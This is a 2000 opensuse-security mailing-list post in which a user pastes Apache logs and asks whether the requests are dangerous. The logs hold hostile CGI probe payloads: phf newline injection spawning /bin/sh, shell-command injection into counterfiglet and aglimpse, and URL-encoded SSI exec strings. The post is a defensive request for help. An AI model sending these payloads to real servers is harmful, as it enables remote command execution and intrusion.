Home | Content | Search | Navigation | Indexes
 

Mailinglist Archive: opensuse-security (191 mails)

< Previous Next >
Web server security holes ?
  • From: Marc Baaden <marc@xxxxxxxxxxxxxxxxxxx>
  • Date: Wed, 05 Apr 2000 09:33:41 +0200
  • Message-id: <200004050733.JAA19374@xxxxxxxxxxxxxxxxx>

Dear All,

I am quite concerned about security, and I think my machine is doing well
with respect to all usual services as telnet, FTP, etc...

Unfortunately I am not very experienced with web servers, and have the standard
features of SuSE 6.3 installed (Apache, I think).
On two of my machines I got the following log entries in http.acces_log/
error_log

- What does it mean ?
- Is it dangerous for the machine ?
- Can I further secure my machine ?
PS: I do NOT need the machine beeing accessible by external machines in HTTP

Thank you for explaining these things to me ...


131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 281
131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280
128.175.13.74 - - [19/Mar/2000:17:43:12 +0100] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%20-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 376
128.175.13.74 - - [20/Mar/2000:03:46:42 +0100] "POST /cgi-bin/test-cgi HTTP/1.0" 200 482
128.175.13.74 - - [20/Mar/2000:06:07:22 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280
128.175.13.74 - - [20/Mar/2000:07:02:50 +0100] "GET /cgi-bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;uname_-a\;id;eval$CMD; HTTP/1.0" 404 346
128.175.13.74 - - [21/Mar/2000:00:50:01 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 281
128.175.13.74 - - [21/Mar/2000:06:33:15 +0100] "POST /cgi-bin/sh HTTP/1.0" 404 279
128.175.13.74 - - [21/Mar/2000:07:17:24 +0100] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 282
128.175.13.74 - - [21/Mar/2000:08:32:59 +0100] "GET /%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E/index.html HTTP/1.0" 404 316


[Sun Mar 19 17:43:12 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/counterfiglet
[Mon Mar 20 06:07:22 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/phf
[Mon Mar 20 07:02:50 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/aglimpse
[Tue Mar 21 00:50:01 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/perl
[Tue Mar 21 06:33:15 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/sh
[Tue Mar 21 07:17:24 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/query


[Thu Mar 30 22:34:16 2000] [notice] Apache/1.3.9 (Unix) (SuSE/Linux) mod_perl/1.21 PHP/3.0.12 configured -- resuming normal operations
[Thu Mar 30 22:34:16 2000] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[


Marc Baaden
--
Marc Baaden - Labo MSM (UMR 7551) - http://crypt.u-strasbg.fr/marc
mailto:baaden@xxxxxxxxxxxxxxxxxxx - FAX (+49) 89 24 43 1 68 68
ICQ# 11466242 - Tel: (+33) 3 88 41 60 86 or (+33) 6 09 84 32 17



< Previous Next >